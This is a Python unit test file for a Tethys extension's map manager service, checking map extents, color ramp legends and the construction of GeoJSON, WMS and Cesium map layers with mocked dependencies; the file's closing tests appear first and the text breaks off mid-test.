self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_extent(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
custom_extent = [1, 2, 3, 4]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
extent=custom_extent
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(custom_extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_style_map(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
style_map = {
'Point': {'ol.style.Style': {
'image': {'ol.style.Circle': {
'radius': 5,
'fill': {'ol.style.Fill': {
'color': 'red',
}},
'stroke': {'ol.style.Stroke': {
'color': 'blue',
}}
}}
}},
}
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
style_map=style_map
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
expected_layer_options = {
'visible': True,
'show_download': False,
'style_map': style_map
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual(expected_layer_options, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_not_visible(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
visible=False
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': False, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
@mock.patch('tethys_gizmos.gizmo_options.map_view.log') # mock out geometry attribute warning
def test_build_mv_layer_selectable(self, _):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
selectable=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(True, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_layer_id(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
layer_id = uuid.uuid4()
layer_id_str = str(layer_id)
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
layer_id=layer_id
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_id_str,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_geometry_attributes(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
geometry_attribute = 'geometry'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
geometry_attribute=geometry_attribute
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_name': layer_name,
'layer_id': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
self.assertEqual(geometry_attribute, ret['geometry_attribute'])
def test_vector_style_map(self):
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.get_vector_style_map()
self.assertIsInstance(ret, dict)
self.assertIn('Point', ret.keys())
self.assertIn('LineString', ret.keys())
self.assertIn('Polygon', ret.keys())
def test_get_plot_for_layer_feature(self):
ret = self.map_manager.get_plot_for_layer_feature(layer_name='layer1', feature_id='F001')
self.assertEqual('F001', ret[1][0]['name'])
self.assertEqual('layer1', ret[2]['xaxis']['title'])
@mock.patch.dict('tethysext.atcore.services.map_manager.MapManagerBase.COLOR_RAMPS', values={'Default': ''}, clear=True) # noqa: E501
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.generate_custom_color_ramp_divisions')
def test_build_legend(self, mock_gccrd):
mock_gccrd.return_value = {'val1': '100', 'val2': '200', 'color1': '#fff100', 'color2': '#ff8c00'}
mock_COLOR_RAMPS = {'Default': ''}
mock_crd_kwargs = {'min_value': 100, 'max_value': 200, 'num_divisions': 2}
mock_layer = {
'layer_name': 'test:layer_name', 'layer_title': 'Test_Title', 'layer_variable': 'test:layer_variable',
'layer_id': '', 'viewparams': None, 'env': None, 'color_ramp_division_kwargs': mock_crd_kwargs
}
expected = {
'legend_id': 'test_layer_variable',
'title': 'Test Title',
'divisions': OrderedDict([(100.0, '#fff100'), (200.0, '#ff8c00')]),
'color_list': mock_COLOR_RAMPS.keys(),
'layer_id': 'test:layer_name',
'min_value': 100,
'max_value': 200,
'color_ramp': 'Default',
'prefix': 'val',
'color_prefix': 'color',
'first_division': 1,
'units': 'Ft',
}
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_legend(mock_layer, units='Ft')
self.assertEqual(ret, expected)
@mock.patch.dict('tethysext.atcore.services.map_manager.MapManagerBase.COLOR_RAMPS', values={'Default': ''}, clear=True) # noqa: E501
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.generate_custom_color_ramp_divisions')
def test_build_legend_with_color_ramp(self, mock_gccrd):
mock_gccrd.return_value = {'val1': '100', 'val2': '200', 'color1': '#fff100', 'color2': '#ff8c00'}
mock_COLOR_RAMPS = {'Default': ''}
mock_crd_kwargs = {'min_value': 100, 'max_value': 200, 'num_divisions': 2, 'color_ramp': 'Default'}
mock_layer = {
'layer_name': 'test:layer_name', 'layer_title': 'Test_Title', 'layer_variable': 'test:layer_variable',
'layer_id': '', 'viewparams': None, 'env': None, 'color_ramp_division_kwargs': mock_crd_kwargs
}
expected = {
'legend_id': 'test_layer_variable',
'title': 'Test Title',
'divisions': OrderedDict([(100.0, '#fff100'), (200.0, '#ff8c00')]),
'color_list': mock_COLOR_RAMPS.keys(),
'layer_id': 'test:layer_name',
'min_value': 100,
'max_value': 200,
'color_ramp': 'Default',
'prefix': 'val',
'color_prefix': 'color',
'first_division': 1,
'units': 'Ft',
}
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_legend(mock_layer, units='Ft')
self.assertEqual(ret, expected) | tethysext/atcore/tests/unit_tests/services/map_manager.py | import copy
import uuid
from collections import OrderedDict
from unittest import mock
import unittest
from tethys_gizmos.gizmo_options import MVLayer
from tethysext.atcore.services.model_database import ModelDatabase
from tethysext.atcore.services.model_db_spatial_manager import ModelDBSpatialManager
from tethysext.atcore.services.map_manager import MapManagerBase
class _MapManager(MapManagerBase):
def compose_map(self, request, *args, **kwargs):
return None
class MapManagerBaseTests(unittest.TestCase):
def setUp(self):
self.spatial_manager = mock.MagicMock(spec=ModelDBSpatialManager)
self.model_db = mock.MagicMock(spec=ModelDatabase)
self.map_manager = _MapManager(self.spatial_manager, self.model_db)
def tearDown(self):
pass
def test_map_extent_property(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
ret = self.map_manager.map_extent
self.map_manager.get_map_extent.assert_called()
self.assertEqual('test_extent', ret)
def test_map_extent_property_cached(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
self.map_manager._map_extent = 'bar'
ret = self.map_manager.map_extent
self.map_manager.get_map_extent.assert_not_called()
self.assertEqual('bar', ret)
def test_default_view_property(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
ret = self.map_manager.default_view
self.map_manager.get_map_extent.assert_called()
self.assertEqual('test_view', ret)
def test_default_view_property_cached(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
self.map_manager._default_view = 'foo'
ret = self.map_manager.default_view
self.map_manager.get_map_extent.assert_not_called()
self.assertEqual('foo', ret)
def test_build_layer_group(self):
ret = self.map_manager.build_layer_group(id='ID001', display_name='Foo', layers='Layer1')
self.assertEqual('Foo', ret['display_name'])
self.assertEqual('ID001', ret['id'])
self.assertEqual('checkbox', ret['control'])
self.assertEqual('Layer1', ret['layers'])
self.assertTrue(ret['visible'])
def test_build_layer_group_value_error(self):
self.assertRaises(ValueError, self.map_manager.build_layer_group,
id='ID001', display_name='Foo', layers='Layer1', layer_control='groupbox')
def test_get_wms_endpoint(self):
ret = self.map_manager.get_wms_endpoint()
self.spatial_manager.get_wms_endpoint.assert_called_with(public=True)
self.assertEqual(self.spatial_manager.get_wms_endpoint(), ret)
@mock.patch('tethysext.atcore.services.map_manager.MVView')
def test_get_map_extent(self, mock_mvv):
test_extent = [-10, -10, 10, 10]
self.spatial_manager.get_extent_for_project.return_value = test_extent
view, extent = self.map_manager.get_map_extent()
mock_mvv.assert_called_with(
projection='EPSG:4326',
center=[0.0, 0.0],
zoom=MapManagerBase.DEFAULT_ZOOM,
maxZoom=MapManagerBase.MAX_ZOOM,
minZoom=MapManagerBase.MIN_ZOOM
)
self.spatial_manager.get_extent_for_project.assert_called_with(
model_db=self.model_db
)
self.assertEqual(mock_mvv(), view)
self.assertEqual(test_extent, extent)
@mock.patch('tethysext.atcore.services.map_manager.MVView')
def test_get_map_extent_no_extent(self, mock_mvv):
self.spatial_manager.get_extent_for_project.return_value = None
view, extent = self.map_manager.get_map_extent()
mock_mvv.assert_called_with(
projection='EPSG:4326',
center=MapManagerBase.DEFAULT_CENTER,
zoom=MapManagerBase.DEFAULT_ZOOM,
maxZoom=MapManagerBase.MAX_ZOOM,
minZoom=MapManagerBase.MIN_ZOOM
)
self.spatial_manager.get_extent_for_project.assert_called_with(
model_db=self.model_db
)
self.assertEqual(mock_mvv(), view)
self.assertIsNone(extent)
def test_generate_custom_color_ramp_divisions(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
value_precision=1,
num_divisions=10
)
expected = {
'val1': '100.0', 'color1': '#fff100',
'val2': '200.0', 'color2': '#ff8c00',
'val3': '300.0', 'color3': '#e81123',
'val4': '400.0', 'color4': '#ec008c',
'val5': '500.0', 'color5': '#68217a',
'val6': '600.0', 'color6': '#00188f',
'val7': '700.0', 'color7': '#00bcf2',
'val8': '800.0', 'color8': '#00b294',
'val9': '900.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_val_no_data(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
value_precision=1,
no_data_value=0,
)
expected = {
'val1': '100.0', 'color1': '#fff100',
'val2': '200.0', 'color2': '#ff8c00',
'val3': '300.0', 'color3': '#e81123',
'val4': '400.0', 'color4': '#ec008c',
'val5': '500.0', 'color5': '#68217a',
'val6': '600.0', 'color6': '#00188f',
'val7': '700.0', 'color7': '#00bcf2',
'val8': '800.0', 'color8': '#00b294',
'val9': '900.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a',
'val_no_data': 0}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_with_colors(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
color_ramp="Blue and Red"
)
expected = {
'val1': '100.00', 'color1': '#a50026',
'val2': '200.00', 'color2': '#d73027',
'val3': '300.00', 'color3': '#f46d43',
'val4': '400.00', 'color4': '#fdae61',
'val5': '500.00', 'color5': '#fee090',
'val6': '600.00', 'color6': '#e0f3f8',
'val7': '700.00', 'color7': '#abd9e9',
'val8': '800.00', 'color8': '#74add1',
'val9': '900.00', 'color9': '#4575b4',
'val10': '1000.00', 'color10': '#313695'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_first_division(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
first_division=0
)
expected = {
'val0': '100.0', 'color0': '#fff100',
'val1': '200.0', 'color1': '#ff8c00',
'val2': '300.0', 'color2': '#e81123',
'val3': '400.0', 'color3': '#ec008c',
'val4': '500.0', 'color4': '#68217a',
'val5': '600.0', 'color5': '#00188f',
'val6': '700.0', 'color6': '#00bcf2',
'val7': '800.0', 'color7': '#00b294',
'val8': '900.0', 'color8': '#009e49',
'val9': '1000.0', 'color9': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_prefix(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
prefix='foo'
)
expected = {
'foo1': '100.0', 'color1': '#fff100',
'foo2': '200.0', 'color2': '#ff8c00',
'foo3': '300.0', 'color3': '#e81123',
'foo4': '400.0', 'color4': '#ec008c',
'foo5': '500.0', 'color5': '#68217a',
'foo6': '600.0', 'color6': '#00188f',
'foo7': '700.0', 'color7': '#00bcf2',
'foo8': '800.0', 'color8': '#00b294',
'foo9': '900.0', 'color9': '#009e49',
'foo10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_top_offset(self):
min_elevation = 10
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
top_offset=900
)
expected = {
'val1': '10.0', 'color1': '#fff100',
'val2': '20.0', 'color2': '#ff8c00',
'val3': '30.0', 'color3': '#e81123',
'val4': '40.0', 'color4': '#ec008c',
'val5': '50.0', 'color5': '#68217a',
'val6': '60.0', 'color6': '#00188f',
'val7': '70.0', 'color7': '#00bcf2',
'val8': '80.0', 'color8': '#00b294',
'val9': '90.0', 'color9': '#009e49',
'val10': '100.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_bottom_offset(self):
min_elevation = 10
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
bottom_offset=900
)
expected = {
'val1': '910.0', 'color1': '#fff100',
'val2': '920.0', 'color2': '#ff8c00',
'val3': '930.0', 'color3': '#e81123',
'val4': '940.0', 'color4': '#ec008c',
'val5': '950.0', 'color5': '#68217a',
'val6': '960.0', 'color6': '#00188f',
'val7': '970.0', 'color7': '#00bcf2',
'val8': '980.0', 'color8': '#00b294',
'val9': '990.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_build_param_string_multiple_kwargs(self):
ret = self.map_manager.build_param_string(foo='bar', baz='jar')
parts = ret.split(';')
self.assertIn('baz:jar', parts)
self.assertIn('foo:bar', parts)
def test_build_param_string_single_kwargs(self):
ret = self.map_manager.build_param_string(foo='bar')
self.assertEqual('foo:bar', ret)
def test_build_param_string_no_kwargs(self):
ret = self.map_manager.build_param_string()
self.assertEqual('', ret)
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_invalid(self, _):
model = [{'model': {'uri': 'glb_file.glb', 'show': True, 'shadows': 'enabled'},
'name': 'Funwave',
'orientation': {
'Cesium.Transforms.headingPitchRollQuaternion':
[{'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
{'Cesium.HeadingPitchRoll': [{'Cesium.Math.toRadians': -42}, 0, 0]}]},
'position': {'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
},
]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
self.assertRaises(ValueError, self.map_manager.build_cesium_layer, cesium_type='WrongType', cesium_json=model,
layer_name=layer_name, layer_title=layer_title, layer_variable=layer_variable)
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_model(self, mock_gvsm, mock_bvl):
model = [{'model': {'uri': 'glb_file.glb', 'show': True, 'shadows': 'enabled'},
'name': 'Funwave',
'orientation': {
'Cesium.Transforms.headingPitchRollQuaternion':
[{'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
{'Cesium.HeadingPitchRoll': [{'Cesium.Math.toRadians': -42}, 0, 0]}]},
'position': {'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
},
]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_cesium_layer(
cesium_type='CesiumModel',
cesium_json=model,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_source='CesiumModel',
layer_id='',
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=model,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_primitive(self, mock_gvsm, mock_bvl):
primitive = [{'Cesium.Cesium3DTileset': {'url': {'Cesium.IonResource.fromAssetId': 512295}}}]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_cesium_layer(
cesium_type='CesiumPrimitive',
cesium_json=primitive,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_source='CesiumPrimitive',
layer_id='',
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=primitive,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_geojson_layer(self, mock_gvsm, mock_bvl):
geojson = {
'type': 'FeatureCollection',
'features': [
{
'type': 'Feature',
'geometry': {'type': 'Point', 'coordinates': [-87.89832948468124, 30.651451015987234]},
'properties': {'id': 4}
},
]
}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_geojson_layer(
geojson=geojson,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
expected_options = copy.deepcopy(geojson)
expected_options['features'][0]['properties']['layer_name'] = layer_name
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='GeoJSON',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_geojson_layer_all_pass_through_args(self, mock_gvsm, mock_bvl):
geojson = {
'type': 'FeatureCollection',
'features': [
{
'type': 'Feature',
'geometry': {'type': 'Point', 'coordinates': [-87.89832948468124, 30.651451015987234]},
'properties': {'id': 4}
},
]
}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_geojson_layer(
geojson=geojson,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
layer_id='LAYER_ID_PASS_THROUGH',
extent=[1, 2, 3, 4],
visible=False,
public=False,
selectable=True,
plottable=True,
has_action=False,
popup_title='POPUP_TITLE_PASS_THROUGH',
excluded_properties=[1, 2, 3]
)
expected_options = copy.deepcopy(geojson)
expected_options['features'][0]['properties']['layer_name'] = layer_name
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_name=layer_name,
layer_source='GeoJSON',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=[1, 2, 3, 4],
layer_id='LAYER_ID_PASS_THROUGH',
visible=False,
public=False,
selectable=True,
show_download=False,
plottable=True,
has_action=False,
popup_title='POPUP_TITLE_PASS_THROUGH',
excluded_properties=[1, 2, 3],
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0'
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry',
times=None,
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_all_pass_through_args(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
visible=False,
selectable=True,
plottable=True,
has_action=False,
extent=[1, 2, 3, 4],
public=False,
geometry_attribute='GEOM_ATTR_PASS_THROUGH',
layer_id='LAYER_ID_PASS_THROUGH',
excluded_properties=[1, 2, 3],
popup_title='POPUP_TITLE_PASS_THROUGH'
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0'
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
visible=False,
selectable=True,
plottable=True,
has_action=False,
extent=[1, 2, 3, 4],
public=False,
geometry_attribute='GEOM_ATTR_PASS_THROUGH',
layer_id='LAYER_ID_PASS_THROUGH',
excluded_properties=[1, 2, 3],
popup_title='POPUP_TITLE_PASS_THROUGH',
times=None,
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_not_tiled(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
tiled=False
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous'
}
mock_bvl.assert_called_once()
mock_bvl.called_with(
layer_id='',
layer_name=layer_name,
layer_source='ImageWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_viewparams(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
